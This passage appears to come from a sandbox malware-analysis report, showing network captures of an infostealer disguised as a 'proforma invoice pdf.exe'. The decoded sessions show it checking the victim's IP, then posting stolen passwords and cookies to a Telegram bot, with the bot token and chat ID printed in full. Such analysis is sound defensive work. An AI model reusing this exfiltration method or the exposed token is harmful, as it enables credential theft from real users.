Jan 8, 2025 12:34:19.403367996 CET	443	49741	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:19.403481960 CET	49741	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:19.403497934 CET	443	49741	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:19.403610945 CET	49741	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:19.403629065 CET	443	49741	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:19.881964922 CET	443	49741	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:19.882052898 CET	443	49741	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:19.887321949 CET	443	49741	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:19.887363911 CET	49741	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:19.892595053 CET	49741	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:19.923100948 CET	49741	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:31.407224894 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:31.407294035 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:31.407356977 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:31.407902956 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:31.407912970 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.017126083 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.113604069 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:32.121253967 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:32.121273041 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.300209999 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.303258896 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:32.303284883 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.305634975 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:32.305659056 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.310599089 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:32.310614109 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.310625076 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:32.310635090 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.843727112 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.843808889 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:32.843835115 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.843867064 CET	443	49742	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:32.843913078 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:32.846766949 CET	49742	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.446381092 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.446435928 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:44.447932005 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.448257923 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.448276997 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:44.461319923 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.461369038 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:44.461555958 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.461838961 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.461850882 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:44.586754084 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.586823940 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:44.586993933 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.587361097 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:44.587377071 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.054194927 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.055891037 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.055924892 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.081283092 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.082739115 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.082763910 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.353214979 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.353702068 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.353743076 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.353874922 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.353894949 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.354008913 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.354033947 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.366436958 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.368115902 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.368144035 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.382592916 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.382936954 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.382978916 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.383085966 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.383106947 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.383203030 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.383255005 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.665981054 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.667921066 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.667967081 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.668257952 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.668277979 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.668378115 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.668423891 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.868338108 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.868437052 CET	443	49744	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.868577003 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.868603945 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.869143009 CET	49744	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.978118896 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.978218079 CET	443	49743	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:45.978341103 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.978727102 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:45.978727102 CET	49743	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:46.106887102 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:46.106973886 CET	443	49745	149.154.167.220	192.168.2.7
Jan 8, 2025 12:34:46.107127905 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:46.107127905 CET	49745	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:34:46.107551098 CET	49745	443	192.168.2.7	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 12:30:33.691996098 CET	49182	53	192.168.2.7	1.1.1.1
Jan 8, 2025 12:30:33.698954105 CET	53	49182	1.1.1.1	192.168.2.7
Jan 8, 2025 12:30:35.432564020 CET	56708	53	192.168.2.7	1.1.1.1
Jan 8, 2025 12:30:35.439445019 CET	53	56708	1.1.1.1	192.168.2.7
Jan 8, 2025 12:32:07.455068111 CET	56438	53	192.168.2.7	1.1.1.1
Jan 8, 2025 12:32:07.461812973 CET	53	56438	1.1.1.1	192.168.2.7
Jan 8, 2025 12:33:09.890839100 CET	50934	53	192.168.2.7	1.1.1.1
Jan 8, 2025 12:33:09.898109913 CET	53	50934	1.1.1.1	192.168.2.7
Jan 8, 2025 12:33:59.820370913 CET	53171	53	192.168.2.7	1.1.1.1
Jan 8, 2025 12:33:59.827219963 CET	53	53171	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 12:30:33.691996098 CET	192.168.2.7	1.1.1.1	0xe165	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:35.432564020 CET	192.168.2.7	1.1.1.1	0xfdda	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:32:07.455068111 CET	192.168.2.7	1.1.1.1	0xa0b0	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:33:09.890839100 CET	192.168.2.7	1.1.1.1	0xa41	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:33:59.820370913 CET	192.168.2.7	1.1.1.1	0x30fe	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 12:30:33.698954105 CET	1.1.1.1	192.168.2.7	0xe165	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:33.698954105 CET	1.1.1.1	192.168.2.7	0xe165	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:33.698954105 CET	1.1.1.1	192.168.2.7	0xe165	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:35.439445019 CET	1.1.1.1	192.168.2.7	0xfdda	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:49.290626049 CET	1.1.1.1	192.168.2.7	0x1c1	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:49.290626049 CET	1.1.1.1	192.168.2.7	0x1c1	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:31:03.525377989 CET	1.1.1.1	192.168.2.7	0xfed3	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:31:03.525377989 CET	1.1.1.1	192.168.2.7	0xfed3	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:32:07.461812973 CET	1.1.1.1	192.168.2.7	0xa0b0	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:33:09.898109913 CET	1.1.1.1	192.168.2.7	0xa41	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:33:59.827219963 CET	1.1.1.1	192.168.2.7	0x30fe	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49709	104.26.12.205	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:34 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-08 11:30:34 UTC	424	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:34 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8febdb34ce26c324-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1627&rtt_var=619&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1754807&cwnd=162&unsent_bytes=0&cid=f4de04f7c16153fe&ts=257&x=0"
2025-01-08 11:30:34 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49711	149.154.167.220	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:36 UTC	260	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fbeb6d69f3b Host: api.telegram.org Content-Length: 980 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:30:36 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:30:36 UTC	980	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 62 65 62 36 64 36 39 66 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 62 65 62 36 64 36 39 66 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 30 38 3a 31 30 3a 33 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fbeb6d69f3bContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fbeb6d69f3bContent-Disposition: form-data; name="caption"New PW Recovered!Time: 01/08/2025 08:10:32User
2025-01-08 11:30:36 UTC	1122	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:30:36 GMT Content-Type: application/json Content-Length: 734 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137987,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335836,"document":{"file_name":"user-116938 2025-01-08 08-30-31.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAECGwNnfmHcStb-K4Lyrnr6HUuGc8Mh4AACQhYAAj848VPi0NhmSFoO6jYE","file_unique_id":"AgADQhYAAj848VM","file_size":351},"caption":"New PW Recovered!\n\nTime: 01/08/2025 08:10:32\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49713	149.154.167.220	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:37 UTC	237	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fcf76777e6f Host: api.telegram.org Content-Length: 4065 Expect: 100-continue
2025-01-08 11:30:37 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:30:37 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 66 37 36 37 37 37 65 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 66 37 36 37 37 37 65 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 31 30 3a 32 30 3a 32 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fcf76777e6fContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fcf76777e6fContent-Disposition: form-data; name="caption"New CO Recovered!Time: 01/08/2025 10:20:26User
2025-01-08 11:30:37 UTC	2991	OUT	Data Raw: 14 e3 74 4d 30 1e 27 e8 69 f4 04 58 9f 3f c8 fa 5a bd de f2 f9 c8 6c d0 b3 2f b8 50 9c f9 18 cb 4e c0 cf b4 ac a8 97 8f e8 cb cb 50 4c 50 fa 65 0d 85 b8 b9 da 3a af bf 6e a1 16 37 69 f9 05 7d b2 a8 e0 4c 65 7b 58 51 e5 54 24 e8 0a ca 5a 15 d6 34 59 8a 45 fa 33 2b 23 bc d1 48 5e 10 90 ba c2 8d c3 bc ca a5 23 67 bd b5 8c 14 55 54 35 14 d3 32 ab 65 45 94 14 51 cb 12 56 35 72 84 d3 97 a5 46 d2 15 c1 c8 ad 10 46 d1 95 ab 65 49 c9 12 0f 27 01 77 8c cc 2b d9 82 a6 da aa cb 21 de e8 b6 6c 6d 2d e9 22 2d 85 f9 f9 64 dc 95 1a 41 51 a4 f1 78 a1 96 8c 1d 5c e2 c4 9d ee f5 fb 1a db dc 81 fa 26 f7 c2 1d e6 87 76 4b a0 79 b7 3b d0 c1 ee f2 74 94 b3 73 dd bb e8 f4 92 ad 94 b9 b0 26 9f 24 52 83 5d ed 89 e0 71 c4 eb 9a 94 3a e6 70 04 ae 12 af f1 bb bc 15 ff c7 ec c6 42 33 Data Ascii: tM0'iX?Zl/PNPLPe:n7i}Le{XQT$Z4YE3+#H^#gUT52eEQV5rFFeI'w+!lm-"-dAQx\&vKy;ts&$R]q:pB3
2025-01-08 11:30:37 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 66 37 36 37 37 37 65 36 66 2d 2d 0d 0a Data Ascii: -----------------------------8dd2fcf76777e6f--
2025-01-08 11:30:38 UTC	1128	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:30:37 GMT Content-Type: application/json Content-Length: 740 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137988,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335837,"document":{"file_name":"user-116938 2025-01-08 10-30-24.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAECGwRnfmHducb9RHtMUlX02S6mbvUiCwACQxYAAj848VNBQzAv20E4qzYE","file_unique_id":"AgADQxYAAj848VM","file_size":3431},"caption":"New CO Recovered!\n\nTime: 01/08/2025 10:20:26\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49715	104.26.12.205	443	3736	C:\Users\user\AppData\Roaming\wTyVrj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:40 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-08 11:30:40 UTC	425	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:40 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8febdb58cfbd0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1608&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1791411&cwnd=231&unsent_bytes=0&cid=92f89e72c40c113f&ts=1516&x=0"
2025-01-08 11:30:40 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49716	149.154.167.220	443	3736	C:\Users\user\AppData\Roaming\wTyVrj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:41 UTC	260	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fc184f85283 Host: api.telegram.org Content-Length: 980 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:30:42 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:30:42 UTC	980	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 31 38 34 66 38 35 32 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 31 38 34 66 38 35 32 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 30 38 3a 35 30 3a 33 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fc184f85283Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fc184f85283Content-Disposition: form-data; name="caption"New PW Recovered!Time: 01/08/2025 08:50:36User
2025-01-08 11:30:42 UTC	1122	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:30:42 GMT Content-Type: application/json Content-Length: 734 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137989,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335842,"document":{"file_name":"user-116938 2025-01-08 08-50-36.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAECGwVnfmHiUqZPusKqwejFJDOoFONXSQACRBYAAj848VOUAS2o501MfjYE","file_unique_id":"AgADRBYAAj848VM","file_size":351},"caption":"New PW Recovered!\n\nTime: 01/08/2025 08:50:36\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49717	149.154.167.220	443	3736	C:\Users\user\AppData\Roaming\wTyVrj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:44 UTC	237	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fd50edc8fb4 Host: api.telegram.org Content-Length: 4065 Expect: 100-continue
2025-01-08 11:30:44 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:30:44 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 64 35 30 65 64 63 38 66 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 64 35 30 65 64 63 38 66 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 31 31 3a 31 30 3a 32 38 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fd50edc8fb4Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fd50edc8fb4Content-Disposition: form-data; name="caption"New CO Recovered!Time: 01/08/2025 11:10:28User
2025-01-08 11:30:44 UTC	2991	OUT	Data Raw: 14 e3 74 4d 30 1e 27 e8 69 f4 04 58 9f 3f c8 fa 5a bd de f2 f9 c8 6c d0 b3 2f b8 50 9c f9 18 cb 4e c0 cf b4 ac a8 97 8f e8 cb cb 50 4c 50 fa 65 0d 85 b8 b9 da 3a af bf 6e a1 16 37 69 f9 05 7d b2 a8 e0 4c 65 7b 58 51 e5 54 24 e8 0a ca 5a 15 d6 34 59 8a 45 fa 33 2b 23 bc d1 48 5e 10 90 ba c2 8d c3 bc ca a5 23 67 bd b5 8c 14 55 54 35 14 d3 32 ab 65 45 94 14 51 cb 12 56 35 72 84 d3 97 a5 46 d2 15 c1 c8 ad 10 46 d1 95 ab 65 49 c9 12 0f 27 01 77 8c cc 2b d9 82 a6 da aa cb 21 de e8 b6 6c 6d 2d e9 22 2d 85 f9 f9 64 dc 95 1a 41 51 a4 f1 78 a1 96 8c 1d 5c e2 c4 9d ee f5 fb 1a db dc 81 fa 26 f7 c2 1d e6 87 76 4b a0 79 b7 3b d0 c1 ee f2 74 94 b3 73 dd bb e8 f4 92 ad 94 b9 b0 26 9f 24 52 83 5d ed 89 e0 71 c4 eb 9a 94 3a e6 70 04 ae 12 af f1 bb bc 15 ff c7 ec c6 42 33 Data Ascii: 